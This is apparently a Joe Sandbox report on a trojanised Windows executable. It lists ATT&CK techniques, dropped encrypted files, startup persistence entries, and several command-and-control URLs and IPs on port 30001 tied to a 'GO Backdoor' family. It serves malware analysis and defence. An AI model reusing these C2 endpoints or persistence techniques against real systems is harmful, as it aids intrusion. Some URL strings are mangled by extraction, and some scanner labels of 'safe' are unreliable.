Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 DLL Side-Loading	NTDS	111 System Information Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iKhdG3bwZK.exe	33%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\yrpfhpihdypx	100%	Avira	TR/Crypt.XPACK.Gen

Source	Detection	Scanner	Label
http://46.8.232.106:30001PXbyn4MOREQUEST_METHOD	0%	Avira URL Cloud	safe
http://91.212.166.91:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ea	0%	Avira URL Cloud	safe
http://46.8.236.61:30001/api/helper-first-register	0%	Avira URL Cloud	safe
http://46.8.236.61:3000146.8.236.61:30001	0%	Avira URL Cloud	safe
http://91.212.166.91:30001/api/helper-first-register	0%	Avira URL Cloud	safe
http://46.8.236.61:30001/api/helper-first-register?	0%	Avira URL Cloud	safe
http://38.180.205.164:30001/api/helper-first-register?	0%	Avira URL Cloud	safe
http://38.180.205.164:30001	0%	Avira URL Cloud	safe
http://91.212.166.91:30001MeQHYhigHTTP/1.1	0%	Avira URL Cloud	safe
http://38.180.205.164:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13e	0%	Avira URL Cloud	safe
http://38.180.205.164:30001/api/helper-first-register	0%	Avira URL Cloud	safe
http://46.8.236.61:3000146.8.236.61:300011u.	0%	Avira URL Cloud	safe
http://188.130.206.243:30001sNxZLFOrHTTP/1.1	0%	Avira URL Cloud	safe
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ead	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0P	0%	Avira URL Cloud	safe
http://188.130.206.243:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS	0%	Avira URL Cloud	safe
http://46.8.236.61:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW	0%	Avira URL Cloud	safe
http://46.8.236.61:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf	0%	Avira URL Cloud	safe
http://38.180.205.164:30001jE9jRK0iMon	0%	Avira URL Cloud	safe
http://46.8.232.106:30001/api/helper-first-register?	0%	Avira URL Cloud	safe
http://188.130.206.243:30001/api/helper-first-register	0%	Avira URL Cloud	safe
http://188.130.206.243:30001/api/helper-first-register?	0%	Avira URL Cloud	safe
http://38.180.205.164:30001/api/helper-first-register2024/11/25	0%	Avira URL Cloud	safe
https://vovsoft.com/translation/	0%	Avira URL Cloud	safe
https://vovsoft.com/php/ocr_download.php?lang=	0%	Avira URL Cloud	safe
http://188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13	0%	Avira URL Cloud	safe
http://188.130.206.243:30001	0%	Avira URL Cloud	safe
http://46.8.232.106:30001	0%	Avira URL Cloud	safe
http://91.212.166.91:30001	0%	Avira URL Cloud	safe
http://91.212.166.91:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU	0%	Avira URL Cloud	safe
https://vovsoft.com/translation/openU	0%	Avira URL Cloud	safe
http://46.8.232.106:30001/api/helper-first-register	0%	Avira URL Cloud	safe
http://91.212.166.91:30001/api/helper-first-register?	0%	Avira URL Cloud	safe
http://38.180.205.164:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST	0%	Avira URL Cloud	safe
http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://vovsoft.com/blog/how-to-activate-using-license-key/openU	iKhdG3bwZK.exe	false		high
http://91.212.166.91:30001/api/helper-first-register	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001PXbyn4MOREQUEST_METHOD	msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.236.61:3000146.8.236.61:30001	msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://38.180.205.164:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13e	msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.236.61:30001/api/helper-first-register?	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://38.180.205.164:30001/api/helper-first-register?	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.crl0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	iKhdG3bwZK.exe	false		high
http://91.212.166.91:30001MeQHYhigHTTP/1.1	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.212.166.91:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ea	msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.color.org	iKhdG3bwZK.exe	false		high
http://38.180.205.164:30001	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.236.61:30001/api/helper-first-register	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-ECC-384-R1.crt0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://188.130.206.243:30001sNxZLFOrHTTP/1.1	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ead	msiexec.exe, 00000007.00000002.2985258925.000000000E44E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vovsoft.com/	iKhdG3bwZK.exe	false		high
https://www.ssl.com/repository0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://46.8.236.61:3000146.8.236.61:300011u.	msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://38.180.205.164:30001/api/helper-first-register	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=openSV	iKhdG3bwZK.exe	false		high
http://46.8.236.61:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0P	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.236.61:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf	msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://38.180.205.164:30001jE9jRK0iMon	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vovsoft.com	iKhdG3bwZK.exe	false		high
http://www.aiim.org/pdfa/ns/id/	iKhdG3bwZK.exe	false		high
http://188.130.206.243:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001/api/helper-first-register?	msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.130.206.243:30001/api/helper-first-register	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vovsoft.com/translation/	iKhdG3bwZK.exe	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001	msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.cer0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://vovsoft.com/php/ocr_download.php?lang=	iKhdG3bwZK.exe	false	Avira URL Cloud: safe	unknown
http://vovsoft.com/help/	iKhdG3bwZK.exe	false		high
http://vovsoft.comopenU	iKhdG3bwZK.exe	false		high
http://vovsoft.comopenS	iKhdG3bwZK.exe	false		high
https://vovsoft.com/blog/credits-and-acknowledgements/open	iKhdG3bwZK.exe	false		high
http://188.130.206.243:30001/api/helper-first-register?	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13	msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.130.206.243:30001	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU	iKhdG3bwZK.exe	false		high
http://38.180.205.164:30001/api/helper-first-register2024/11/25	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.212.166.91:30001	msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.212.166.91:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vovsoft.com/translation/openU	iKhdG3bwZK.exe	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001/api/helper-first-register	msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	iKhdG3bwZK.exe, 00000000.00000002.1838026347.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127296333.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983761692.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crls.ssl.com/ssl.com-EVecc-RootCA.crl0	msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://91.212.166.91:30001/api/helper-first-register?	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://38.180.205.164:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST	msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV	msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vovsoft.com/openU	iKhdG3bwZK.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.232.106	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
188.130.206.243	unknown	Russian Federation	200509	SVINT-ASNES	true
91.212.166.91	unknown	United Kingdom	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	true
38.180.205.164	unknown	United States	174	COGENT-174US	true
109.172.88.38	unknown	Russian Federation	41691	SUMTEL-AS-RIPEMoscowRussiaRU	true
46.8.236.61	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562117
Start date and time:	2024-11-25 08:31:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iKhdG3bwZK.exe renamed because original name is a hash value
Original Sample Name:	1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/6@0/6
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 90% Number of executed functions: 7 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 6620 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: iKhdG3bwZK.exe

Simulations

Behavior and APIs

Time	Type	Description
02:32:14	API Interceptor	1x Sleep call for process: iKhdG3bwZK.exe modified
07:32:28	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT89BA.tmp
07:32:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LogiAiPrompt.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.8.232.106	Week11.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	m0Yc9KltGw.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	SecuriteInfo.com.FileRepMalware.7838.24766.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	sV9ElC4fU4.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
188.130.206.243	Week11.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	m0Yc9KltGw.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	SecuriteInfo.com.FileRepMalware.7838.24766.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
91.212.166.91	Week11.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	m0Yc9KltGw.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	SecuriteInfo.com.FileRepMalware.7838.24766.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	sV9ElC4fU4.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SVINT-ASNES	Week11.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	m0Yc9KltGw.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	https://t.ly/Oppenheim0511	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	SecuriteInfo.com.FileRepMalware.7838.24766.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	https://t.ly/BavariaFilmGmbH2410	Get hash	malicious	Unknown	Browse	188.130.206.243
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	na.elf	Get hash	malicious	Mirai, Moobot	Browse	188.130.200.140
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	ppc.elf	Get hash	malicious	Mirai	Browse	46.8.228.104
	file.exe	Get hash	malicious	Cryptbot	Browse	46.8.237.112
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	46.8.237.112
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	46.8.237.112
	Week11.exe	Get hash	malicious	GO Backdoor	Browse	46.8.236.61
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	46.8.236.61
	m0Yc9KltGw.exe	Get hash	malicious	GO Backdoor	Browse	46.8.236.61
	https://t.ly/Oppenheim0511	Get hash	malicious	GO Backdoor	Browse	46.8.232.106
	SecuriteInfo.com.FileRepMalware.3248.17662.exe	Get hash	malicious	Unknown	Browse	46.8.237.66
	fCr6yd61xw.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	46.8.237.66
MOBILY-ASEtihadEtisalatCompanyMobilySA	https://docs.google.com/presentation/d/1z_B5nVWxQSqBMnIWjAfO37AM3HSOm_XjEmM3UM39DA0/preview	Get hash	malicious	Unknown	Browse	91.212.166.23
	owari.arm7.elf	Get hash	malicious	Mirai	Browse	176.16.93.46
	owari.x86.elf	Get hash	malicious	Unknown	Browse	37.240.149.115
	botx.spc.elf	Get hash	malicious	Mirai	Browse	31.166.208.149
	yakuza.sh.elf	Get hash	malicious	Mirai	Browse	37.242.55.57
	yakuza.mipsel.elf	Get hash	malicious	Mirai	Browse	37.127.4.133
	dvwkja7.elf	Get hash	malicious	Mirai	Browse	31.167.45.251
	meerkat.mpsl.elf	Get hash	malicious	Mirai	Browse	178.81.128.72
	Week11.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91
	Week11.exe.bin.exe	Get hash	malicious	GO Backdoor	Browse	91.212.166.91

Process:	C:\Users\user\Desktop\iKhdG3bwZK.exe
File Type:	PNG image data, 1568 x 6367, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8071264
Entropy (8bit):	7.998527454344914
Encrypted:	true
SSDEEP:	196608:CguSpqlsmyvv4goCjPUhnYLhXxiKXmdKsMcf4lByIX356zBNA+:VRpnmyn4GjMSxQodsMIzB
MD5:	EED4DD96D51D1CAAFCB3026C24A4A2E5
SHA1:	EC15B39B09CC050557DFBBC98A801F3E52058047
SHA-256:	B8DA1717759662235F3343D648A5F27A9B3D8675998783A4B8158C75AF3C0D34
SHA-512:	8D3900230AEBE9A9C95EAE464DA9387913B0DC9C9117DC3D13CEBAF58AAD995334B16B0343855EE8BB21821B7FBAF94280972E56E9EA69E7412AF4496A2ABB98
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR... ..........X^... .IDATx..;...&z...\|..b.;....%..%a...W.-.ZW..]B.....g...6..."43{..yww....W\.dFg...........tfeT..O..`o.{............py..~.....1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?...............n.5.0..L...C.\|.....Z.o..\|..9.H....\|.5..\|..G..HO.=,.........`...w..c.G.u..ZW.p.e7,yf..q..\|.`..oH@@.}F......#...m.3..c...6.g..n/.......c$.3..H.....s.9..&.\|...r.._..o..;...RJ)\|......,../..ksw..P..p.]....T.K1.R..i...... ..I.A.m..,(.....w" .....{..........&h...N...@S.w.},_.&?"..K.....v....1.........k.d0.\|@j.b.cr..,..^M`.r..>.o..)<\!w...a...+....ea.p...N..n...p....+...z...p.lU0._.....?cl@(.....U..e..............?Rsr)/......km..Z....z.`o......I,_.k2...+..D.. .3...K.8.....>.c..`Z.j.IB...%...@.........~/.8..xaT..'...C....q.O.-._...;.../....!.\p)$.T...o..C..3..\|.(..<..3r.F7d..Jr...v.1...\r!.y....MS..=....u

C:\Users\user\AppData\Local\Temp\4ed6fba4

Download File

Process:	C:\Users\user\Desktop\iKhdG3bwZK.exe
File Type:	data
Category:	dropped
Size (bytes):	8383605
Entropy (8bit):	7.939772690584366
Encrypted:	false
SSDEEP:	196608:R9DkjzBHzUonQEuisAMxa+tbj7dys/GEfrX011J:R9DAlIoncFvdyKGEfrX011J
MD5:	CF94B2D34E15D4B68DE9B3726D7FEA21
SHA1:	3A550DD0C6193B40C2FB1673F840CCC382795738
SHA-256:	F068A6730DBF2816F80B10DEA96A4B9BAC72D0A6B556D3FAE01208F78C43CF84
SHA-512:	1060033F48E26DE75E368E53FC242BC79B11D74D7FF0FE5A67E67498940005925A33B3E514864E7A85AC549AF154C10EA737770072472EB75348D61668A99101
Malicious:	false
Reputation:	low
Preview:	).P[+.P[.P[.P[+.P[..P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.Q[....n......2I.?(E.$.}.>?E.#.y.1)^..>D...X.7)K.#.y.1)^. [.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[i..5C.9:F.>o.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[i..)O.$>c.#/K.3>.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[....n..~v.98X.#4L.~.o...X.=>]."0.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[\.~k..`l..P[.P[.P[.P[.P[.P[.P[.P[.P[.P[.P[

C:\Users\user\AppData\Local\Temp\6460e813

Download File

Process:	C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe
File Type:	PNG image data, 1568 x 6367, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8071264
Entropy (8bit):	7.998527454344914
Encrypted:	true
SSDEEP:	196608:CguSpqlsmyvv4goCjPUhnYLhXxiKXmdKsMcf4lByIX356zBNA+:VRpnmyn4GjMSxQodsMIzB
MD5:	EED4DD96D51D1CAAFCB3026C24A4A2E5
SHA1:	EC15B39B09CC050557DFBBC98A801F3E52058047
SHA-256:	B8DA1717759662235F3343D648A5F27A9B3D8675998783A4B8158C75AF3C0D34
SHA-512:	8D3900230AEBE9A9C95EAE464DA9387913B0DC9C9117DC3D13CEBAF58AAD995334B16B0343855EE8BB21821B7FBAF94280972E56E9EA69E7412AF4496A2ABB98
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR... ..........X^... .IDATx..;...&z...\|..b.;....%..%a...W.-.ZW..]B.....g...6..."43{..yww....W\.dFg...........tfeT..O..`o.{............py..~.....1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?...............n.5.0..L...C.\|.....Z.o..\|..9.H....\|.5..\|..G..HO.=,.........`...w..c.G.u..ZW.p.e7,yf..q..\|.`..oH@@.}F......#...m.3..c...6.g..n/.......c$.3..H.....s.9..&.\|...r.._..o..;...RJ)\|......,../..ksw..P..p.]....T.K1.R..i...... ..I.A.m..,(.....w" .....{..........&h...N...@S.w.},_.&?"..K.....v....1.........k.d0.\|@j.b.cr..,..^M`.r..>.o..)<\!w...a...+....ea.p...N..n...p....+...z...p.lU0._.....?cl@(.....U..e..............?Rsr)/......km..Z....z.`o......I,_.k2...+..D.. .3...K.8.....>.c..`Z.j.IB...%...@.........~/.8..xaT..'...C....q.O.-._...;.../....!.\p)$.T...o..C..3..\|.(..<..3r.F7d..Jr...v.1...\r!.y....MS..=....u

C:\Users\user\AppData\Local\Temp\config

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1056
Entropy (8bit):	6.343639101336781
Encrypted:	false
SSDEEP:	24:YFLt1nffIQSm2mz1dTPDKz0G6tIv/5lHGi1di+eO:YTZfgXmfBDKz0G6Wv/PmNq
MD5:	BF2C65C2451D39AC7E0D24279D9D3393
SHA1:	CF1427BEA5132D90E09A3385C4622617E80E346F
SHA-256:	624526C1A5484697ABCDA7B18AC1DB3192D4EF54C94289B311F93B902A89D0EF
SHA-512:	A60177EF5A191C87518D6A2B17526A9C08BB48132998D3F30371809782AC224A027C9E989A214C57BA363D0F902812855E1EC277CD89F43B56252356A63280FF
Malicious:	false
Reputation:	low
